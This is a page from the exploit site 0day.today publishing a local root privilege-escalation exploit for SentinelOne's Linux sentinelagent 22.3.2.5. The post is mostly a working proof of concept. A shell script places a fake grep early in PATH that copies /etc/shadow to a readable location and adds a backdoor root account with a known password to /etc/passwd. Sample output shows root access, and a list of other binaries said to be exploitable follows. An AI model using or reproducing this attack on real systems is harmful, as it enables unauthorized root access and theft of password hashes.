0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
SentinelOne sentinelagent 22.3.2.5 Privilege Escalation Vulnerability
[Exploit Title: SentinelOne sentinelagent (linux) root Privilege Escalation zero day vulnerability
Exploit Author: ouch_this_hurts
Vendor Homepage: https://www.sentinelone.com/
Software Link: https://assets.sentinelone.com/prod/s1-linux-agent-datas
Version: 22.3.2.5
Tested on: Ubuntu 22.04.x
CVE: NA
Not enough AI in the world can help you write secure software it seems? The vendor doesnt make reporting vulnerabilities easy, so to exploit-db it goes :)
Protips:
- If I Google you, and I cannot find an easy way to report the vulnerability, I'm not going to bother.
- If you require me to use HackerOne, I'm not going to bother.
- If you dont have a security.txt, how do you expect me to contact you?
Get `root` on a system with `sentinelagent<=22.3.2.5` with one simple trick:
Override `grep` in the `PATH` with your malicious code. Reboot. pwnd. Nice!
PoC below:
1. Find the systems "earliest" `PATH`, or just override it to whatever you want in `/etc/environment` with some other staged exploit.
2. Create the following `grep` file in that directory and make sure its executable:
```shell
cat << SENTINELOOPS > /usr/local/bin/grep
#!/bin/bash
# I think I'll have the passwds pl0x
cat /etc/shadow > /tmp/etc_shadow
# password is password :)
echo 'sentinel_oops:\$1\$user1\$WuzQ29wbcMN09VLW7X0/q1:0:0::/root:/bin/sh' >> /etc/passwd
SENTINELOOPS
chmod +x /usr/local/bin/grep
```
3. Wait for machine to reboot, login as `sentinel_oops:password` :)
```
$ su sentinel_oops
Password:
# whoami
root
```
What actually happened here? On `sentinelagent` start it runs `sh -c "grep...."`.
So there are potentially other ways of privilege escalation via this "agent"?
- `grep` as demonstrated above
- `pgrep` examining the binary appears to be vulnerable
- `xargs` examining the binary appears to be vulnerable
- `cat` examining the binary appears to be vulnerable
- `pgrep` examining the binary appears to be vulnerable
- `ldd` examining the binary appears to be vulnerable
- `lsmod` examining the binary appears to be vulnerable
- `mksh` examining the binary appears to be vulnerable
- `awk` examining the binary appears to be vulnerable
[CWE-427](https://cwe.mitre.org/data/definitions/427.html) and [how to write secure software](https://youtu.be/RfiQYRn7fBg?t=16)
# 0day.today [2024-11-16] #